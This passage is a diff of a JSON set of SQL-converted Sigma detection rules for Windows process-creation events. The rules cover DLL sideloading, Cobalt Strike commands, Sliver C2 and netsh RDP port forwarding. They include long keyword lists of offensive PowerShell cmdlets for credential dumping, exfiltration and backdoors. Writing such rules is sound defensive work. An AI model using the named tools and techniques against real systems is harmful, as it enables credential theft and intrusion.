"ebea773c-a8f1-42ad-a856-00cb221966e8", + "status": "experimental", + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" + "attack.t1574.002" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_susp_execution.yml" + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" }, { - "title": "PUA- IOX Tunneling Tool Execution", - "id": "d7654f02-e04b-4934-9838-65c46f187ebc", + "title": "Operator Bloopers Cobalt Strike Commands", + "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", "status": "experimental", - "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.command_and_control", - "attack.t1090" + 
"attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_iox.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" }, { - "title": "Run PowerShell Script from ADS", - "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", - "status": "test", - "description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", - "author": "Sergey Soldatov, Kaspersky Lab, 
oscd.community", + "title": "Malicious PowerShell Commandlets - ProcessCreation", + "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", + "status": "experimental", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADR%' ESCAPE '\\' OR CommandLine LIKE 
'%Export-ADRCSV%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRExcel%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRHTML%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRJSON%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRXML%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ADIDNS%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' 
OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE 
'%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR 
CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' 
ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%New-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_ads.yml" + "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" }, { - "title": "Suspicious Use of CSharp Interactive Console", - "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", + "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", + "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", "status": "test", - "description": "Detects the execution of CSharp interactive console by PowerShell", - "author": "Michael R. 
(@nahamike01)", + "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.execution", - "attack.t1127" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_use_of_csharp_console.yml" + "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" }, { - "title": "Ps.exe Renamed SysInternals Tool", - "id": "18da1007-3f26-470f-875d-f77faf1cab31", - "status": "test", - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - PowerTool Execution", + "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "status": "experimental", + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "author": "Nasreddine Bencherchali 
(Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" + "attack.t1562.001" ], "falsepositives": [ - "Renamed SysInternals tool" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine = 'ps.exe -accepteula')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" ], - "filename": "proc_creation_win_apt_ta17_293a_ps.yml" + "filename": "proc_creation_win_hktl_powertool.yml" }, { - "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", - "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "title": "Disabled Volume Snapshots", + "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", "status": "test", - "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", - "author": "John Lambert (rule)", + "description": "Detects commands that temporarily turn off Volume Snapshots", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE 
'%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE '%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE 
'%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + "filename": "proc_creation_win_reg_volsnap_disable.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", - "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "title": "HackTool - Sliver C2 Implant Activity Pattern", + "id": "42333b2c-b425-441c-b70e-99404a17170f", "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Unlikely" 
